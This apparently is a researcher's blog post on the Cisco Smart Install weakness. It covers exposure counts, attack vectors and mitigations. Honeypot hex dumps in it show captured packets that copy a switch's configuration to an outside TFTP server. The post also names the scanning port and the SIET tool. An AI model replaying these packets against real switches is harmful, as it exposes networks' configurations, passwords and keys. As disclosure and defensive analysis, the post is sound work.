Cisco SMI: Still Tippin'

--- Intro ------------------------------------------------------------------//-- Configuration management is hard, expecially at scale. Cisco IOS and IOS XE software has a feature which allows for simpler deployment of a new switch, allowing for easy plug-and-play configuration. The feature is known as Cisco Smart Install (SMI), and makes it less painful to configure new switches.
The core of Cisco SMI is a network of Smart Install devices, a director, and any number of clients. The director acts as the manager for images and device configurations for clients. When a switch is brought online, the director will detect it, and begin configuring the device according to specifications. The key feature of this is that this network of SMI device is ad hoc, and as a result, there is no authentication, and implicit trust given by clients. Back in 2017, there had been a number of vulnerabilities disclosed regarding Cisco Smart Install, leading to several CVEs and PoCs for exploiting an exposed SMI service. These allowed for DoS, configuration changes, and even a full rewrite of the firmware image on the device. In 2018, a buffer overflow vulnerability was disclosed in Cisco SMI, leading to remote code execution on a given router. Cisco came out with an advisory about the vulnerability, and it was given a CVE. This upgraded the severity from "protocol misuse" to full blown vulnerability. In April 2018, a US-CERT advisory was released regarding the discovery of Russian State-Sponsored actors targeting this specific vulnerability, and using it to attack critical infrastructure. This vulnerability is easily exploitable, is being actively exploited, and can have devastating effects on networks for organizations, governments, and entire countries. --- What's out there? ------------------------------------------------------//-- Given all of this information, how many vulnerable devices do you think are still out there in the wild? To put it simply...a lot. The shodan search "Cisco Smart Install Client active" yields over 50,000 results as of this writing. Some of these results come and go, as devices are configured and quickly locked down. Many of them stay online for a while without the knowledge of the admins of the network. :: What have I found? :: I have found and disclosed a number of vulnerable Cisco switches to various organizations. These include government, defense, and tier-1 network targets, all of whom have had vulnerable devices sitting on their networks. This ultimately led me to writing about the lasting effects of this vulnerability for organizations who may be unaware, and researchers who are interested in network infrastructure. --- What are the implications? ---------------------------------------------//-- The routers with vulnerabilities that I have reported have typically been ones that are connected to things that appear to be on the sensitive side in terms of overall impact. If a malicious actor wanted to exploit these, there are a few approaches they could take. The first stage would involve identifying the target. Connecting to port 4786 will inform an attacker if the SMI banner is visible. From there, the SIET tool can be used to determine if the target is vulnerable. The following is a list of possible attack vectors for a Cisco SMI device once it is determined to be vulnerable. :: DoS :: The simplest thing an attacker can do is a Denial of Service. This can be done in a number of ways, including tampering with device configurations, and issuing commands to shut down the device. The impact of this is immediate, anything that the router is responsible for routing will no longer have access to the internet. :: Change Configuration :: Changing the device configuration is also another trivial attack vector. The configuration files contain a lot of information. You can find network mappings, acls, passwords, certificates, and other parameters relevant to the network in a given config file. Changes to this can be used for all sorts of nefarious purposes. Compromising certificates and keys, hijacking routing, and locking the administrators out of the switch. :: GRE Tunnel :: GRE tunnels can easily be configured by modifying the device configuration. GRE tunnels in hijacked SMI routers have been used to reroute DNS queries to an attackers infrastructure. Router level DNS hijacking on sensitive networks can have devastating effects that are not easy to detect. :: Malicious Firmware :: A feature of SMI is the ability for a SMI director to load a new firmware image onto a client device. There are many implications for loading a new image. While this might be the most challenging thing to pull off, it could be the most costly in terms of a persistence. :: Remote Code Execution :: An RCE is possible through a stack overflow when sending a discovery message to a given client. The size of the message is not properly checked by the device, leading to remote code execution. More information on the technical details and a PoC can be found here. --- Why should I care? -----------------------------------------------------//-- This vulnerability has been known for over two years, and it is still quite common. Even in the wake of US-CERT advisories, vendor patches, and tools built to exploit this, many large organizations in all sectors continue to deploy vulnerable switches. Taking a look at the Greynoise visualizer tool, we can get a better look at how many people are scanning for these devices as well.
There is still quite a lot of activity for this service, and some of my own honeypots have picked up activity on this port. Since there is widespread tooling for exploiting SMI, it's likely that most attackers are simply scaling these tools. --- What does an attack look like? -----------------------------------------//-- Depending on the tooling used, your typical attack will look something like this: [2019-08-03 19:12:39] 104.225.219.19 00000000: 00 00 00 01 00 00 00 01 00 00 00 0A 00 00 00 50 ...............P 00000010: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................ 00000020: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................ 00000030: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................ 00000040: FF FF FF FF 55 5C CA 68 00 00 00 00 00 00 00 00 ....U\.h........ 00000050: 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 01 ................ 00000060: 00 00 00 01 00 00 00 01 00 00 00 08 00 00 01 68 ...............h 00000070: 00 01 00 14 00 00 00 01 00 00 00 00 00 21 D8 63 .............!.c 00000080: A5 60 00 00 00 02 01 54 63 6F 6E 66 69 67 75 72 .`.....Tconfigur 00000090: 65 20 74 66 74 70 2D 73 65 72 76 65 72 20 6E 76 e tftp-server nv 000000A0: 72 61 6D 3A 73 74 61 72 74 75 70 2D 63 6F 6E 66 ram:startup-conf 000000B0: 69 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ig.............. ...snip... 000001D0: 00 00 00 00 00 00 00 00 ........ The first message is the command configure tftp-server nvram:startup-config, which attempts to start up the tftp server on the router with the system's configuration file. [2019-08-03 19:55:13] 104.225.219.19 00000000: 00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08 ................ 00000010: 00 01 00 14 00 00 00 01 00 00 00 00 FC 99 47 37 ..............G7 00000020: 86 60 00 00 00 03 03 F4 63 6F 70 79 20 73 79 73 .`......copy sys 00000030: 74 65 6D 3A 72 75 6E 6E 69 6E 67 2D 63 6F 6E 66 tem:running-conf 00000040: 69 67 20 66 6C 61 73 68 3A 2F 63 6F 6E 66 69 67 ig flash:/config 00000050: 2E 74 65 78 74 00 00 00 00 00 00 00 00 00 00 00 .text........... 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ ...snip... 00000170: 00 00 00 00 00 00 00 00 63 6F 70 79 20 66 6C 61 ........copy fla 00000180: 73 68 3A 2F 63 6F 6E 66 69 67 2E 74 65 78 74 20 sh:/config.text 00000190: 74 66 74 70 3A 2F 2F 31 30 34 2E 32 32 35 2E 32 tftp://104.225.2 000001A0: 31 39 2E 31 39 2F XX XX 2E XX XX XX 2E XX XX XX 19.19/XX.XXX.XXX 000001B0: XX 31 35 39 2E 63 6F 6E 66 00 00 00 00 00 00 00 .XXX.conf....... ...snip... 000003F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ The second message is attempting to copy the running configuration file into flash memory, and then transfer it to a remote server over tftp. This command sequence is straight out of the SIET tool's get-config option. --- What can we do about it? -----------------------------------------------//-- * Disable SMI if a switch is on a public network. * Upgrade your switch. * Report vulnerable devices on sensitive networks if you find them. --- greetz -----------------------------------------------------------------//-- As always, thanks to my buddies at ThugCrowd for letting me rant and confirm my suspicions. Shoutout hermit, dnz, notdan, readme, sshell, protoxin, phreck, hexadecim8, casey @ bugcrowd, hackerone, Level3, and all the orgs who didn't threaten me when I came to them with this information. Special shoutout goes to Andrew Morris of GreyNoise for letting me use their sweet visualizer while it was still in development while researching this.